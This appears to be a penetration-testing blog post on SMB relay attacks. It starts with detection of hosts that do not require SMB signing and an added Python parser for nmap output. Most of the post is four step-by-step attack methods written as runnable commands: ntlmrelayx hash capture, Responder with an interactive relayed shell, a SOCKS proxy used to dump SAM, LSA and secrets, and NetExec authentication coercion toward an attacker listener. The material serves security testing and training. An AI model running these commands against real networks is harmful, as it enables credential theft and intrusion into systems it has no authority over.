SMB Relay Attack
SMB relay is a man-in-the-middle attack in which an attacker intercepts NTLM authentication between a client and a server and relays it to another target server. The attacker does not need to crack any password; the authentication exchange is simply forwarded in real time. The relay only succeeds against targets that do not require SMB signing, which is why the detection step below looks for exactly that.
Detection
```bash
nmap --script smb-security-mode.nse,smb2-security-mode.nse -p445 $ip
nxc smb $ip/24 --gen-relay-list target.txt
```
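As an added defender-side example (not part of the original post), the Python below parses the output of the nmap command above, in the constructed sample shape shown, and reports the hosts where SMB signing is not required, i.e. the hosts that must have signing enforced. The names HOST_RE, parse_signing and relay_exposed, and the sample IPs, are chosen here.

```python
import re
from typing import Dict, List

# Constructed sample shaped like the nmap output for smb-security-mode (SMB1)
# and smb2-security-mode (SMB2); the IPs are made up.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 10.10.10.5
Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required

Nmap scan report for 10.10.10.10
Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")

def parse_signing(nmap_output: str) -> Dict[str, bool]:
    """Map each host to True only if every SMB dialect nmap reported requires
    signing; hosts without any signing line are omitted."""
    required: Dict[str, bool] = {}
    host = None
    for raw in nmap_output.splitlines():
        m = HOST_RE.match(raw)
        if m:
            host = m.group(1)
            continue
        line = raw.lstrip("|_ ").lower()  # drop the NSE "|" / "|_" prefix
        # SMB1 script: "message_signing: required|supported|disabled ..."
        # SMB2 script: "Message signing enabled and required" / "... but not required"
        if host is None or not line.startswith(("message_signing:", "message signing")):
            continue
        is_required = "required" in line and "not required" not in line
        required[host] = required.get(host, True) and is_required
    return required

def relay_exposed(nmap_output: str) -> List[str]:
    """Hosts accepting unsigned SMB sessions: the ones a relay can reach and
    the ones where 'require signing' must be enforced."""
    return sorted(h for h, ok in parse_signing(nmap_output).items() if not ok)
```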
Method 1: Hashes

```bash
# Generate the list of targets (hosts where SMB signing is not required)
nxc smb $ip/24 --gen-relay-list target.txt
# Start ntlmrelayx against the whole list ...
impacket-ntlmrelayx -tf target.txt -smb2support
# ... or against a single target
impacket-ntlmrelayx -t single_target -smb2support
# Wait a few seconds and you will be able to grab hashes.
```
Method 2: Interactive shell

Slight changes to the Responder config file are needed first (turn off its SMB and HTTP servers so they do not conflict with ntlmrelayx).

```bash
# use sed:
sed -i 's/SMB = On/SMB = Off/g' /usr/share/responder/Responder.conf
sed -i 's/HTTP = On/HTTP = Off/g' /usr/share/responder/Responder.conf
# start your Responder
sudo responder -I eth0 -dwv
# Terminal 2: Generate relay targets
nxc smb $ip/24 --gen-relay-list targets.txt
# Terminal 3: Start relay
sudo ntlmrelayx.py -tf targets.txt -smb2support -i
# Get your shell (ntlmrelayx prints the local port it bound)
nc 127.0.0.1 <port>
```
Method 3: SOCKS Proxy

```bash
# Terminal 1: Responder
sudo responder -I eth0 -dwv
# Terminal 2: ntlmrelayx with SOCKS
nxc smb $ip/24 --gen-relay-list targets.txt
sudo ntlmrelayx.py -tf targets.txt -smb2support -socks
# Terminal 3: Check active sessions
# (inside the ntlmrelayx prompt)
socks
# Terminal 4: Use proxychains
echo "socks4 127.0.0.1 1080" | sudo tee -a /etc/proxychains4.conf
proxychains nxc smb $ip -u '' -p '' --sam --lsa
proxychains secretsdump.py DOMAIN/user@$ip -no-pass
```
Method 4: Active Coercion with NetExec

```bash
# Terminal 1: Generate targets
nxc smb $ip/24 --gen-relay-list nosigning.txt
# Terminal 2: Start relay
sudo ntlmrelayx.py -tf nosigning.txt -smb2support -socks
# Terminal 3: Check coercion vulns
nxc smb $ip/24 -u user -p pass -M coerce_plus
# Terminal 4: Trigger coercion
nxc smb $ip -u user -p pass -M coerce_plus -o LISTENER=<AttackerIP> ALWAYS=true
# Result: Machine authenticates to ntlmrelayx
# → Credentials relayed to targets in nosigning.txt
# → SOCKS session established
```
This post is licensed under CC BY 4.0 by the author.
